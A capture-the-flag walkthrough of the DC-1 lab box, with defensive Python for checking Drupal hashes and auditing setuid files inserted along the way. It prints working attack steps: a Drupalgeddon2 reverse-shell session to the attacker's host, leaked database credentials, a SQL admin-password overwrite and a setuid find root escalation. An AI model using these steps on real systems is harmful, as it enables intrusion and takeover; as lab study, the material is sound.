ARP scan

nmap

    nmap -sS -sV -A -n 192.168.100.31
It looks like a Drupal site.

111/tcp: the rpcbind service is open.

SSH brute force

    nmap --script=ssh-brute 192.168.100.31

No result.

Visit port 80.

Search for an exploit in msf
    msf6 > use 1
    [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
    msf6 exploit(unix/webapp/drupal_drupalgeddon2) > info

           Name: Drupal Drupalgeddon 2 Forms API Property Injection
         Module: exploit/unix/webapp/drupal_drupalgeddon2
       Platform: PHP, Unix, Linux
           Arch: php, cmd, x86, x64
     Privileged: No
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2018-03-28

    Provided by:
      Jasper Mattsson
      a2u
      Nixawk
      FireFart
      wvu <wvu@metasploit.com>

    Module stability:
      crash-safe

    Available targets:
          Id  Name
          --  ----
      =>  0   Automatic (PHP In-Memory)
          1   Automatic (PHP Dropper)
          2   Automatic (Unix In-Memory)
          3   Automatic (Linux Dropper)
          4   Drupal 7.x (PHP In-Memory)
          5   Drupal 7.x (PHP Dropper)
          6   Drupal 7.x (Unix In-Memory)
          7   Drupal 7.x (Linux Dropper)
          8   Drupal 8.x (PHP In-Memory)
          9   Drupal 8.x (PHP Dropper)
          10  Drupal 8.x (Unix In-Memory)
          11  Drupal 8.x (Linux Dropper)

    Check supported:
      Yes

    Basic options:
      Name         Current Setting  Required  Description
      ----         ---------------  --------  -----------
      DUMP_OUTPUT  false            no        Dump payload command output
      PHP_FUNC     passthru         yes       PHP function to execute
      Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
      RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
      RPORT        80               yes       The target port (TCP)
      SSL          false            no        Negotiate SSL/TLS for outgoing connections
      TARGETURI    /                yes       Path to Drupal install
      VHOST                         no        HTTP server virtual host

    Payload information:
      Avoid: 3 characters

    Description:
      This module exploits a Drupal property injection in the Forms API.
      Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.

    References:
      https://nvd.nist.gov/vuln/detail/CVE-2018-7600
      https://www.drupal.org/sa-core-2018-002
      https://greysec.net/showthread.php?tid=2912
      https://research.checkpoint.com/uncovering-drupalgeddon-2/
      https://github.com/a2u/CVE-2018-7600
      https://github.com/nixawk/labs/issues/19
      https://github.com/FireFart/CVE-2018-7600

    Also known as:
      SA-CORE-2018-002
      Drupalgeddon 2

    View the full module info with the info -d command.

    msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.100.31
    RHOSTS => 192.168.100.31
    msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run

    [*] Started reverse TCP handler on 192.168.100.251:4444
    [*] Running automatic check ("set AutoCheck false" to disable)
    [!] The service is running, but could not be validated.
    [*] Sending stage (39927 bytes) to 192.168.100.31
    [*] Meterpreter session 1 opened (192.168.100.251:4444 -> 192.168.100.31:52398) at 2024-03-03 16:49:50 +0800
Session established.

Look for the flag.

Translation:

    Every good CMS needs a config file - and you do too.

Drupal's configuration files are mainly settings.php and sites/default/settings.php.

Translation:

    Brute force and dictionary attacks aren't the only way to gain access (and you will need access).
    What can you do with these credentials?
    $databases = array (
      'default' => array (
        'default' => array (
          'database' => 'drupaldb',
          'username' => 'dbuser',
          'password' => 'R0ck3t',
          'host' => 'localhost',
          'port' => '',
          'driver' => 'mysql',
          'prefix' => '',
        ),
      ),
    );

Spawn an interactive shell with Python

    python -c 'import pty; pty.spawn("/bin/bash")'
    www-data@DC-1:/var/www$

Log in to the database with the account found above (user dbuser, password R0ck3t).

Rows from the users table:

    | 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |
    | 2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |
Change the password

Method 1: change the admin password. The hashing script:

    cat /var/www/scripts/password-hash.sh

Hash 123456:

    php /path/to/password-hash.php "123456"

Update the admin password:

    mysql> use drupaldb;
    Database changed
    mysql> update users set pass = "$S$D1UQvb3x7lKoCSX6S9K.r.wB202Lsa/r7fkOj7CelJsSEMFDJjGv" where name = 'admin';
    Query OK, 1 row affected (0.00 sec)
    Rows matched: 1  Changed: 1  Warnings: 0

Refresh the page and log in.
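The `$S$D…` strings above are Drupal 7 password hashes: `$S$` marks the SHA-512 scheme, the fourth character encodes the iteration count (`D` is 2^15 = 32768 rounds), the next eight characters are the salt, and the rest is the truncated digest. The following is an added example, not code from the writeup or Drupal's own password.inc, that re-implements that scheme so an auditor can read the cost of stored hashes and confirm whether a hash corresponds to a given password. `WRITEUP_HASH` is the value the writeup stores for admin; the hash names, helper names and the 7-round salt used for testing are this example's own.

```python
"""Drupal 7 password hashes ($S$...) re-implemented for auditing.

Added example; not code from the writeup nor Drupal's own password.inc.
Follows the published Drupal 7 scheme: phpass-style SHA-512, an
8-character salt, 2**count_log2 rounds, a custom base64 alphabet, and
output truncated to 55 characters.
"""
import hashlib
import os
from typing import Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # DRUPAL_HASH_LENGTH
DEFAULT_COUNT_LOG2 = 15     # DRUPAL_HASH_COUNT; ITOA64[15] is 'D', hence "$S$D"
MIN_COUNT_LOG2, MAX_COUNT_LOG2 = 7, 30

# Hash the writeup stores for admin after running password-hash.sh on "123456"
WRITEUP_HASH = "$S$D1UQvb3x7lKoCSX6S9K.r.wB202Lsa/r7fkOj7CelJsSEMFDJjGv"


def _b64(data: bytes) -> str:
    """phpass-style base64 (Drupal's _password_base64_encode)."""
    out, i, n = [], 0, len(data)
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= n:
            break
    return "".join(out)


def iteration_count(stored: str) -> int:
    """SHA-512 rounds encoded in the hash's fourth character."""
    return 1 << ITOA64.index(stored[3])


def _crypt(password: str, setting: str) -> Optional[str]:
    setting = setting[:12]                  # "$S$" + cost char + 8-char salt
    if len(setting) < 12 or setting[0] != "$" or setting[2] != "$":
        return None
    count_log2 = ITOA64.find(setting[3])
    if not MIN_COUNT_LOG2 <= count_log2 <= MAX_COUNT_LOG2:
        return None
    salt = setting[4:12].encode()
    pw = password.encode()
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):        # iterated: digest || password
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _b64(digest))[:HASH_LENGTH]


def hash_password(password: str, count_log2: int = DEFAULT_COUNT_LOG2,
                  salt: Optional[str] = None) -> Optional[str]:
    """Produce a fresh $S$ hash; the salt is random unless given (tests)."""
    if salt is None:
        salt = _b64(os.urandom(6))[:8]      # 6 random bytes -> 8 salt chars
    return _crypt(password, "$S$" + ITOA64[count_log2] + salt)


def check_password(password: str, stored: str) -> bool:
    """Drupal 7's user_check_password for $S$ hashes; legacy $P$/$H$ md5 hashes are rejected."""
    if not stored.startswith("$S$"):
        return False
    return _crypt(password, stored) == stored


if __name__ == "__main__":
    print("rounds in writeup hash:", iteration_count(WRITEUP_HASH))
    print("writeup hash encodes '123456':", check_password("123456", WRITEUP_HASH))
```

Two things this makes checkable from the database side: whether every stored hash still carries the `$S$D` cost the site is configured for (a lower cost character, or a legacy `$P$`/`$H$` prefix, is a sign of imported or downgraded hashes), and whether an admin row's hash matches a password you did not set, which is exactly the change the writeup makes and exactly what a periodic comparison of the `users.pass` column against a known-good snapshot would catch.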
Method 2: add a user with admin privileges

    ┌──(root㉿kali)-[~/Desktop]
    └─# msfconsole

           =[ metasploit v6.3.19-dev                          ]
    + -- --=[ 2318 exploits - 1215 auxiliary - 412 post       ]
    + -- --=[ 1234 payloads - 46 encoders - 11 nops            ]
    + -- --=[ 9 evasion                                        ]

    Metasploit tip: View missing module options with show missing
    Metasploit Documentation: https://docs.metasploit.com/

    msf6 > searchsploit drupal
    [*] exec: searchsploit drupal

    Exploit Title                                                        | Path
    -------------------------------------------------------------------- | ---------------------------------
    Drupal 4.0 - News Message HTML Injection                             | php/webapps/21863.txt
    Drupal 4.1/4.2 - Cross-Site Scripting                                | php/webapps/22940.txt
    Drupal 4.5.3 < 4.6.1 - Comments PHP Injection                        | php/webapps/1088.pl
    Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution          | php/webapps/1821.php
    Drupal 4.x - URL-Encoded Input HTML Injection                        | php/webapps/27020.txt
    Drupal 5.2 - PHP Zend Hash ation Vector                              | php/webapps/4510.txt
    Drupal 5.21/6.16 - Denial of Service                                 | php/dos/10826.sh
    Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilit  | php/webapps/11060.txt
    Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)    | php/webapps/34992.py
    Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)     | php/webapps/44355.php
    Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Passw  | php/webapps/34984.py
    Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Passw  | php/webapps/34993.php
    Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execu  | php/webapps/35150.php
    Drupal 7.12 - Multiple Vulnerabilities                               | php/webapps/18564.txt
    Drupal 7.x Module Services - Remote Code Execution                   | php/webapps/41564.php
    Drupal < 4.7.6 - Post Comments Remote Command Execution              | php/webapps/3313.pl
    Drupal < 5.1 - Post Comments Remote Command Execution                | php/webapps/3312.pl
    Drupal < 5.22/6.16 - Multiple Vulnerabilities                        | php/webapps/33706.txt
    Drupal < 7.34 - Denial of Service                                    | php/dos/35415.txt
    Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasp  | php/webapps/44557.rb
    Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Executi  | php/webapps/44542.txt
    Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remot  | php/webapps/44449.rb
    Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Ex  | php/remote/44482.rb
    Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Ex  | php/webapps/44448.py
    Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Rem  | php/remote/46510.rb
    Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution       | php/webapps/46452.txt
    Drupal < 8.6.9 - REST Module Remote Code Execution                   | php/webapps/46459.py
    Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure    | php/webapps/44501.txt
    Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)   | php/webapps/50841.txt
    Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections       | php/webapps/32415.txt
    Drupal Module CAPTCHA - Security Bypass                              | php/webapps/35335.html
    Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-  | php/webapps/18389.txt
    Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent C  | php/webapps/25493.txt
    Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)      | php/webapps/40149.rb
    Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution        | php/remote/40144.php
    Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scrip  | php/webapps/35397.txt
    Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary   | php/webapps/37453.php
    Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media:  | php/webapps/35072.txt
    Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation         | php/webapps/50361.txt
    Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)    | php/remote/40130.rb
    Drupal Module Sections - Cross-Site Scripting                        | php/webapps/10485.txt
    Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection              | php/webapps/33410.txt
    -------------------------------------------------------------------- | ---------------------------------
    Shellcodes: No Results

    msf6 > searchsploit 34992.py -p
    [*] exec: searchsploit 34992.py -p
      Exploit: Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)
          URL: https://www.exploit-db.com/exploits/34992
         Path: /usr/share/exploitdb/exploits/php/webapps/34992.py
        Codes: CVE-2014-3704, OSVDB-113371, SA-CORE-2014-005
     Verified: True
    File Type: Python script, ASCII text executable, with very long lines (340)
    msf6 >
Script:

https://www.exploit-db.com/exploits/34992

Download the script and run it.

After logging in, find flag3.

Translation:

    Special permissions will help find the password, but you need to use the -exec argument to run that command in order to work out how to get what's in the shadow file.
    Can you use this same method to find or access the flag in root?
    Probably. But perhaps it's not that easy. Or maybe it is?
The shadow file cannot be opened.

Brute force: the wordlist is in wordlists.

Connect over SSH.

The flag there is the flag4.txt seen earlier.
/usr/bin/find
Privilege escalation

    find / -name index.php -exec "/bin/sh" \;

The escalation succeeds: the prompt is now the superuser's #.

Enter the root directory.
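The escalation above works only because /usr/bin/find carries the setuid bit and find's -exec runs whatever program it is given as the file's owner; any setuid interpreter, editor or pager gives the same result. The following is an added example for host hardening, not part of the writeup: it walks a filesystem, lists every regular file with the setuid bit, and classifies each one as critical (can execute arbitrary programs), expected (normally setuid on a Linux install) or needing review. Both name lists are assumptions chosen for illustration, not a complete catalogue, and `make_sample_tree` builds a constructed fixture in a temporary directory so the audit can be exercised without touching the real system.

```python
"""Audit setuid binaries and flag the ones that can hand out a shell.

Added example for host hardening, not from the writeup. Name lists are
assumed common cases, not a definitive catalogue.
"""
import os
import stat
import tempfile
from typing import Dict, List, Tuple

# Binaries that can run arbitrary commands or spawn a shell (assumed list)
SHELL_CAPABLE = {"find", "vim", "vi", "nano", "less", "more", "awk", "env",
                 "bash", "sh", "python", "python2", "python3", "perl"}
# Binaries that are legitimately setuid root on a typical install (assumed list)
EXPECTED_SETUID = {"passwd", "su", "sudo", "mount", "umount", "ping",
                   "chsh", "chfn", "gpasswd", "newgrp"}


def find_setuid(root: str) -> List[Tuple[str, int]]:
    """Return (path, owner uid) for every regular setuid file under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):      # symlinked dirs not followed
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)                  # lstat: never follow symlinks
            except OSError:
                continue                             # unreadable or vanished; skip
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return hits


def classify(path: str) -> str:
    base = os.path.basename(path)
    if base in SHELL_CAPABLE:
        return "critical"   # setuid + arbitrary exec = owner's shell for any local user
    if base in EXPECTED_SETUID:
        return "expected"
    return "review"         # unknown setuid binary: justify it or drop the bit


def audit_setuid(root: str = "/") -> Dict[str, str]:
    """Map each setuid file under root to its classification."""
    return {path: classify(path) for path, _uid in find_setuid(root)}


def summarize(report: Dict[str, str]) -> Dict[str, str]:
    """Key a report by file name so results are easy to compare."""
    return {os.path.basename(path): level for path, level in report.items()}


def make_sample_tree() -> str:
    """Constructed fixture: a temp dir mimicking a system with a setuid find."""
    base = tempfile.mkdtemp(prefix="suid-audit-")
    bindir = os.path.join(base, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("find", 0o4755), ("passwd", 0o4755),
                       ("custom-helper", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)                         # 0o4xxx sets the setuid bit
    return base


if __name__ == "__main__":
    for path, level in sorted(audit_setuid("/").items(), key=lambda kv: kv[1]):
        print(f"{level:9} {path}")
```

On the DC-1 box the audit would report /usr/bin/find as critical; the fix is to clear the bit (`chmod u-s /usr/bin/find`), and the same walk run periodically, diffed against a known-good baseline, catches a setuid bit that has been added after the fact.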
OVER